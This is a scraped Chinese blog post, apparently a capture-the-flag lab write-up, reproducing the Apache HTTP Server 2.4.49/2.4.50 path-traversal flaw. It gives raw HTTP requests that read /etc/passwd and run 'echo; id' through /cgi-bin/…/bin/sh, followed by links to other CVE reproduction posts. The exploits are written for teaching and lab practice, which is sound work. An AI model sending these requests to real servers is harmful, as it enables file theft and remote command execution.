代码编织梦想

描述

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。 

复现

1.打开靶场

2.文件读取,用burp抓包然后发送请求

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1

 

 3.rce命令执行

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1
Content-Length: 8

echo; id

 

4.上述执行成功,ls /tmp找到flag

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62063669/article/details/127000344

s2-016——struts2漏洞分析及复现(cve-2013-2251)-爱代码爱编程

漏洞原理: 空虚浪子新大牛是这么描述这个漏洞的:”在struts中,框架接收到的用户输入,除了参数、值以外,还有其他地方,比如文件名。这个漏洞,是struts2对url中的文件名做了解析,导致的ognl代码执行。” 官方是这样描述这个漏洞产生原因的:Struts2的DefaultActionMapper支持一种方法,可以使用”action:”, “re

cve-2021-41773(42013) apache http server路径穿越漏洞复现_wavesky111的博客-爱代码爱编程

一、漏洞概述 Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展,将 Perl/Python 等解释器编译到服务器中。 Apache 披露了一个在 Apache HTTP S

cve-2021-42013 apache http server 路径穿越漏洞——漏洞复现_留将一面与花的博客-爱代码爱编程

    Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。同时发布了2.4.50更新,修复了这个漏洞。该漏洞允许攻击者绕过路径遍历保护,使用编码并读取网络服务器文件系统上的任意文件。运行此版本 Apache 的 Linux 和 Windows 服务器都受到影响。此漏洞是在 2.

cve-2021-44228——log4j2-rce漏洞复现_li-d的博客-爱代码爱编程

漏洞介绍 Apache Log4j2是一个基于java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 影响版本 Apa

cve-2020-9484 tomcat session 反序列化复现_wavesky111的博客-爱代码爱编程

一、漏洞概述   Apache Tomcat发布通告称修复了一个源于持久化Session的远程代码执行漏洞(CVE-2020-9484)。漏洞条件比较苛刻: tomcat必须启用session持久化功能FileStoretomcat/lib或者WEB-INF/lib目录下的依赖存在可用的gadget在服务器上存在已知路径文件内容可控——引自这里

[ 漏洞复现篇 ] apache shiro 身份认证绕过漏洞 (cve-2022-32532)__powershell的博客-爱代码爱编程

🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连

vulfocus——shiro 身份验证绕过(cve-2020-13933)_隐身的菜鸟的博客-爱代码爱编程

描述 Apache Shiro身份验证绕过漏洞CVE-2020-11989的修复补丁存在缺陷,在1.5.3及其之前的版本,由于shiro在处理url时与spring仍然存在差异,依然存在身份校验绕过漏洞由于处理身份验证请求时出错,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。 这是一个绕过身份验证查看敏感信息的漏洞

羊了个羊网页版_小虎周的博客-爱代码爱编程

最近羊了个羊火的不得了,利用周末时间实现一个网页版。步骤如下: 1,用reactjs 实现。 2,实现Gameroom类。 3,实现Card类。 4,通过父组件控制子组件通信方式,控制点击事件。 5,通过top,left属

漏洞复现——log4j2-爱代码爱编程

一、漏洞介绍 漏洞名称:Apache Log4j2远程代码执行漏洞 组件名称:Apache Log4j2 截止2021年1210,受影响的Apache log4j2版本: 2.0≤Apache Log4j<=2.15.0-rc1 漏洞类型:远程代码执行 二、漏洞复现 实验环境:本地vulfocus靶场 使用工具:burpsuite、c

cve-爱代码爱编程

一、漏洞概述 6月29日,Apache 官方披露 Apache Shiro 权限绕过漏洞(CVE-2022-32532),当 Apache Shiro 中使用 RegexRequestMatcher 进行权限配置,且正则表达式中携带“.”时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证。 二、影响版本 Apache Shiro <

vulfocus——solr远程命令执行(cve-爱代码爱编程

描述 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。  复现 1.打开靶场环境 2.访问页面默认会有一个叫demo的core 3.通过访问特定url启用配置params.resource.loader

java的编码方式、单个char类型存储大部分中文字符、getbytes()、new string()的转换流程_new string指定编码-爱代码爱编程

目录 一 编码种类 1.1 ASCII码 1.2 ISO8859-1编码 1.3 GBK编码 1.4 Unicode字符集 1.4.1 UTF-8编码 1.4.2 UTF-16编码 1.4.3 UTF-32编码 二 Java编码方式          2.1 内码、外码 2.2 单个char类型能存储大部分(BMP范围内)中文 2.

web前端、html-爱代码爱编程

文章目录 前端:一、web标准1.什么是web标准作用 二、网页的基本结构1.HTML语言2.HTML语言骨架3.网页的基础标签4.网页常用布局 前端: 一、web标

用js输出200到300之间所有质数及其个数_js随机数生成200到300-爱代码爱编程

<!DOCTYPE html> <html>     <head>         <meta charset="utf-8">         <title></title>         <script>             var count = 0;     

vulfocus——struts2-爱代码爱编程

描述 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了get

vulfocus——struts2代码执行(cve-爱代码爱编程

描述 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 Struts 2.3.20 - Struts Struts 2.3.28 (除2.3.20.3及2.3.24.3)版本,使用REST插件情况下,若启用了Dyna